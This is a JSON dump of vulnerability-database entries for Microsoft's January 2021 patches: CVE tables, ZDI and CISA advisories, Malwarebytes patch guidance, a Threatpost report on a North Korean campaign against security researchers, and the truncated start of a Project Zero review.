7.8 | No \n[CVE-2021-1663](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1663>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | 
No | 5.5 | Yes \n[CVE-2021-1670](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1670>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1672](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1672>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1689](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1689>) | Windows Multipoint Management Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1682](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1682>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-1697](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1697>) | Windows InstallService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1662](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1662>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1703](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1703>) | Windows Event Logging Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1645](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1645>) | Windows Docker Information Disclosure Vulnerability | No | No | 5 | Yes \n[CVE-2021-1637](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1637>) | Windows DNS Query Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1638](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1638>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 7.7 | No 
\n[CVE-2021-1683](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1683>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 5 | No \n[CVE-2021-1684](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1684>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 5 | No \n[CVE-2021-1642](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1642>) | Windows AppX Deployment Extensions Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1685](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1685>) | Windows AppX Deployment Extensions Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-1648](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1648>) | Microsoft splwow64 Elevation of Privilege Vulnerability | No | Yes | 7.8 | Yes \n[CVE-2021-1710](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1710>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1691](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1691>) | Hyper-V Denial of Service Vulnerability | No | No | 7.7 | No \n[CVE-2021-1692](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1692>) | Hyper-V Denial of Service Vulnerability | No | No | 7.7 | No \n[CVE-2021-1643](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1643>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1644](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1644>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## Windows Apps Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? 
\n---|---|---|---|---|--- \n[CVE-2021-1669](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1669>) | Windows Remote Desktop Security Feature Bypass Vulnerability | No | No | 8.8 | Yes \n \n## Windows ESU Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1709](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1709>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-1694](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1694>) | Windows Update Stack Elevation of Privilege Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-1702](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1702>) | Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1674>) | Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability | No | No | 8.8 | No \n[CVE-2021-1695](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1695>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1676](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1676>) | Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1706](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1706>) | Windows LUAFV Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-1661](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1661>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1704](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1704>) | Windows Hyper-V Elevation of Privilege Vulnerability | 
No | No | 7.3 | No \n[CVE-2021-1696](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1696>) | Windows Graphics Component Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1708>) | Windows GDI+ Information Disclosure Vulnerability | No | No | 5.7 | Yes \n[CVE-2021-1657](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1657>) | Windows Fax Compose Form Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1679](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1679>) | Windows CryptoAPI Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-1652](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1652>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1653](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1653>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1654](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1654>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1655](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1655>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1659](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1659>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1688>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1693](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1693>) | Windows CSC Service Elevation of Privilege Vulnerability 
| No | No | 7.8 | No \n[CVE-2021-1699](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1699>) | Windows (modem.sys) Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1656](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1656>) | TPM Device Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1658](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1658>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1660](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1660>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1666](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1666>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1667](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1667>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1673](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1673>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1664](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1664>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1671](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1671>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1700>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No 
\n[CVE-2021-1701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1701>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1678](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1678>) | NTLM Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-1668](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1668>) | Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1665](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1665>) | GDI+ Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1649](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1649>) | Active Template Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n## Summary Graphs\n\n\n\n________Note: Graph data is reflective of data presented by Microsoft's CVRF at the time of writing.________", "modified": "2021-01-12T23:59:00", "published": "2021-01-12T23:59:00", "id": "RAPID7BLOG:A8AF62CC15B38126207722D29F080EE3", "href": "https://blog.rapid7.com/2021/01/12/patch-tuesday-january-2021/", "type": "rapid7blog", "title": "Patch Tuesday - January 2021", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-01-26T16:35:34", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "Hackers linked to [North Korea](<https://threatpost.com/north-korea-spy-reporters-feds-warn/160622/>) are targeting security researchers with an elaborate social-engineering campaign that sets up trusted relationships with them \u2014 and then infects their organizations\u2019 systems with custom backdoor malware.\n\nThat\u2019s according to [Google\u2019s Threat Analysis Group (TAG),](<https://twitter.com/ShaneHuntley/status/1353856344655204352>) which issued a warning late Monday about a campaign 
it has tracked over the last several months that uses various means to interact with and attack professionals working on vulnerability research and development at multiple organizations.\n\nThe effort includes attackers going so far as to set up their own research blog, multiple Twitter profiles and other social-media accounts in order to look like legitimate security researchers themselves, according to a [blog post](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) by TAG\u2019s Adam Weidermann. Hackers first establish communications with researchers in a way that looks like they are credibly working on similar projects, then they ask them to collaborate, and eventually infect victims\u2019 machines.\n\nThe infections are propagated either through a backdoored Visual Studio Project or via a malicious website, he wrote. Moreover, those infected were running fully patched and up-to-date Windows 10 and Chrome browser versions \u2014 a signal that hackers likely are using zero-day vulnerabilities in the campaign, the researcher concluded.\n\nTAG attributed the threat actors to \u201ca government-backed entity based in North Korea.\u201d\n\n\u201cThey\u2019ve used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits, and for amplifying and retweeting posts from other accounts that they control,\u201d according to the post. 
\u201cTheir blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including \u2018guest\u2019 posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.\u201d\n\nIn addition to Twitter, threat actors also used other platforms, including LinkedIn, Telegram, [Discord](<https://threatpost.com/discord-stealing-malware-npm-packages/163265/>), Keybase and email to communicate with potential targets, Weidermann said. So far it seems that only security researchers working on Windows machines have been targeted.\n\n## **Making Connections**\n\nAttackers initiate contact by asking a researcher if he or she wants to collaborate on vulnerability research. The threat actors appear credible because they have already posted videos of exploits they claim to have worked on, including a YouTube video that fakes a working exploit for an existing and recently patched [Windows Defender vulnerability](<https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/>), [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>).\n\nThe vulnerability drew notoriety because researchers believe it had been exploited for roughly three months and was leveraged as part of the massive [SolarWinds attack](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>).\n\n\u201cIn the video, they purported to show a successful working exploit that spawns a cmd.exe shell, but a careful review of the video shows the exploit is fake,\u201d Weidermann explained.\n\nIf an unsuspecting targeted researcher agrees to collaborate, attackers then provide the researcher with a Visual Studio Project infected with malicious code. 
Several targets [took to Twitter](<https://twitter.com/search?q=blog.br0vvnn.io&src=typed_query>) to describe their experiences.\n\n> I got targeted by Zhang Guo and sent me the blog post link hxxps://blog.br0vvnn[.]io/pages/blogpost.aspx?id=1&q=1 <https://t.co/QR5rUYDHrh>\n> \n> \u2014 lockedbyte (@lockedbyte) [January 26, 2021](<https://twitter.com/lockedbyte/status/1353995532180615174?ref_src=twsrc%5Etfw>)\n\n\u201cWithin the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events,\u201d Weidermann wrote. \u201cThe DLL is custom malware that would immediately begin communicating with actor-controlled command-and-control (C2) domains.\u201d\n\nVictims also can be infected by following a link posted on Twitter to a write-up hosted on blog.br0vvnn[.]io, the threat actors\u2019 own blog, according to TAG. Shortly after the visit, a malicious service is installed on the researcher\u2019s system and an in-memory backdoor begins beaconing to an actor-owned C2 server, researchers discovered.\n\nThe TAG team so far could not confirm the mechanism of compromise and asked the wider security community to identify and submit relevant information through the [Chrome Vulnerability Reward Program](<https://www.google.com/about/appsecurity/chrome-rewards/>).\n\nResearchers also did not specifically say what the likely motive was for the attacks; however, presumably the threat actors aim to uncover and steal vulnerabilities to use in North Korean advanced persistent threat (APT) campaigns.\n\nWeidermann\u2019s post includes a list of known accounts being used in the campaign, and he advised researchers who may have communicated with any of the accounts or visited related sites to review their systems for compromise.\n\n\u201cWe hope this post will remind those in the security research community that they are targets to government-backed attackers and should remain vigilant when 
engaging with individuals they have not previously interacted with,\u201d Weidermann wrote.\n", "modified": "2021-01-26T14:49:03", "published": "2021-01-26T14:49:03", "id": "THREATPOST:FF67AF009F2F0031599099334F6CC306", "href": "https://threatpost.com/north-korea-security-researchers-0-day/163333/", "type": "threatpost", "title": "North Korea Targets Security Researchers in Elaborate 0-Day Campaign", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-01-15T10:26:58", "bulletinFamily": "blog", "cvelist": ["CVE-2021-1647"], "description": "Every second Tuesday of the month it's 'Patch Tuesday'. On Patch Tuesday Microsoft habitually issues a lot of patches for bugs and vulnerabilities in its software.\n\nIt's always important to patch, but the update that was released on January 12 is one to pay attention to. That's because it contains a patch for a vulnerability in Windows Defender that is already being exploited in the wild.\n\n### The vulnerability in Windows Defender\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) list\u2014a dictionary that provides definitions for publicly disclosed cybersecurity vulnerabilities and exposures. 
The goal of CVE is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe vulnerability in Windows Defender was registered as [CVE-2021-1647](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-1647>)\u2014a Remote Code Execution ([RCE](<https://blog.malwarebytes.com/glossary/remote-code-execution-rce-attack/>)) vulnerability\u2014and was found in the Malware Protection Engine component (mpengine.dll). According to Microsoft: \n\n> "While this issue is labeled as an elevation of privilege, it can also be exploited to disclose information. The type of information that could be disclosed if an attacker successfully exploited this vulnerability is uninitialized memory."\n\n### I don\u2019t see an update for this vulnerability\n\nIf you are missing this fix in your list, it's possible that this bug has already been patched by Microsoft on end-user systems, as the company continuously updates Defender outside of the normal monthly patch cycle. But you may want to check whether you are using a patched version.\n\n### What version of Windows Defender am I using?\n\nThe first patched version is 1.1.17700.4. If you want to make sure that you have a patched version of Windows Defender, here is how you can check this on a Windows 10 computer:\n\n * From the Windows Start Menu, search for **Windows Security** and click on the result that has the **App** text and the \u201cwhite on blue\u201d shield.\n * When Windows Security opens, click on the gear box icon with the **Settings** text at the bottom left of the Window.\n * When the Settings screen opens, click on the **About** link.\n * The Windows Security About page will now be open and will show the Antimalware Client Version (Microsoft Defender version), the Engine version (Scanning Engine), the Antivirus version (Virus definitions), and the Antispyware version (Spyware definitions).\n * The **engine version** is the one that matters here. 
It needs to be at 1.1.17700.4 or newer.\nFinding the Windows Defender version\n\n### The rest of the Microsoft updates\n\nThe total package contained over 80 patches. Ten of them were classified as critical, which means that they could possibly be used in the future by cybercriminals to attack unpatched systems. And even the ones that are not rated as critical could put you at risk at some point. It's always important to apply all the patches as soon as you possibly can, especially when it concerns your operating system. So, please do go install these patches as soon as possible.\n\nStay safe, everyone!\n\nThe post [Microsoft issues 83 patches, one for actively exploited vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/microsoft-issues-83-patches-one-for-actively-exploited-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2021-01-13T19:40:58", "published": "2021-01-13T19:40:58", "id": "MALWAREBYTES:C38FDAA2A9E5E349305313C6D17A0D3A", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/microsoft-issues-83-patches-one-for-actively-exploited-vulnerability/", "type": "malwarebytes", "title": "Microsoft issues 83 patches, one for actively exploited vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:06:37", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "Microsoft has released a security advisory to address a remote code execution vulnerability,[ CVE-2021-1647](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647>), in Microsoft Defender. A remote attacker can exploit this vulnerability to take control of an affected system. This vulnerability was detected in exploits in the wild.\n\nCISA encourages users and administrators to review Microsoft Advisory for CVE-2021-1647 and apply the necessary updates. 
\n", "modified": "2021-01-14T00:00:00", "published": "2021-01-14T00:00:00", "id": "CISA:F7C7CFE30EB8A6B7C1DCDEA50F649F74", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/01/14/rce-vulnerability-affecting-microsoft-defender", "type": "cisa", "title": "RCE Vulnerability Affecting Microsoft Defender ", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2021-01-16T03:31:04", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1647"], "description": "\n", "edition": 4, "modified": "2021-01-15T08:00:00", "id": "MS:CVE-2021-1647", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1647", "published": "2021-01-15T08:00:00", "title": "Microsoft Defender Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-16T01:37:12", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1648"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1648", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1648", "published": "2021-01-12T08:00:00", "title": "Microsoft splwow64 Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-21T13:27:52", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1658"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1658", "href": 
"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1658", "published": "2021-01-12T08:00:00", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T13:28:02", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1666"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1666", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1666", "published": "2021-01-12T08:00:00", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-21T13:29:55", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1665"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1665", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1665", "published": "2021-01-12T08:00:00", "title": "GDI+ Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-21T13:27:36", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1673"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1673", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1673", "published": "2021-01-12T08:00:00", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-21T13:29:56", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1705"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1705", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1705", "published": 
"2021-01-12T08:00:00", "title": "Microsoft Edge (HTML-based) Memory Corruption Vulnerability", "type": "mscve", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-21T13:27:50", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1660"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1660", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1660", "published": "2021-01-12T08:00:00", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-21T13:27:40", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1667"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1667", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1667", "published": "2021-01-12T08:00:00", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2021-01-14T19:27:09", "bulletinFamily": "info", "cvelist": ["CVE-2021-1648"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. 
An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "edition": 1, "modified": "2021-01-14T00:00:00", "published": "2021-01-14T00:00:00", "id": "ZDI-21-024", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-024/", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-14T19:27:09", "bulletinFamily": "info", "cvelist": ["CVE-2021-1648"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "edition": 1, "modified": "2021-01-14T00:00:00", "published": "2021-01-14T00:00:00", "id": "ZDI-21-020", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-020/", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-14T19:27:09", "bulletinFamily": "info", "cvelist": ["CVE-2021-1648"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 
The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "edition": 1, "modified": "2021-01-14T00:00:00", "published": "2021-01-14T00:00:00", "id": "ZDI-21-022", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-022/", "title": "Microsoft Windows splwow64 Untrusted Pointer Dereference Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-21T19:27:56", "bulletinFamily": "info", "cvelist": ["CVE-2021-1648"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. 
An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "edition": 1, "modified": "2021-01-21T00:00:00", "published": "2021-01-21T00:00:00", "id": "ZDI-21-078", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-078/", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2021-02-04T19:27:43", "bulletinFamily": "info", "cvelist": ["CVE-2014-9665", "CVE-2015-0093", "CVE-2015-0993", "CVE-2018-8653", "CVE-2019-0880", "CVE-2019-1367", "CVE-2019-13674", "CVE-2019-13695", "CVE-2019-13764", "CVE-2019-1429", "CVE-2019-5870", "CVE-2020-0674", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-15999", "CVE-2020-17008", "CVE-2020-27930", "CVE-2020-6383", "CVE-2020-6572", "CVE-2020-6820", "CVE-2021-1648"], "description": "A Year in Review of 0-days Exploited In-The-Wild in 2020\n\nPosted by Maddie Stone, Project Zero\n\n2020 was a year full of 0-day exploits. Many of the Internet\u2019s most popular browsers had their moment in the spotlight. Memory corruption is still the name of the game and how the vast majority of detected 0-days are getting in. While we tried new methods of 0-day detection with modest success, 2020 showed us that there is still a long way to go in detecting these 0-day exploits in-the-wild. But what may be the most notable fact is that 25% of the 0-days detected in 2020 are closely related to previously publicly disclosed vulnerabilities. In other words, 1 out of every 4 detected 0-day exploits could potentially have been avoided if a more thorough investigation and patching effort were explored. 
Across the industry, incomplete patches \u2014 patches that don\u2019t correctly and comprehensively fix the root cause of a vulnerability \u2014 allow attackers to use 0-days against users with less effort.\n\nSince mid-2019, Project Zero has dedicated an effort specifically to track, analyze, and learn from 0-days that are actively exploited in-the-wild. For the last 6 years, Project Zero\u2019s mission has been to \u201cmake 0-day hard\u201d. From that came the goal of our in-the-wild program: \u201cLearn from 0-days exploited in-the-wild in order to make 0-day hard.\u201d In order to ensure our work is actually making it harder to exploit 0-days, we need to understand how 0-days are actually being used. Continuously pushing forward the public\u2019s understanding of 0-day exploitation is only helpful when it doesn\u2019t diverge from the \u201cprivate state-of-the-art\u201d, what attackers are doing and are capable of. \n\nOver the last 18 months, we\u2019ve learned a lot about the active exploitation of 0-days and our work has matured and evolved with it. [For the 2nd year in a row](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>), we\u2019re publishing a \u201cYear in 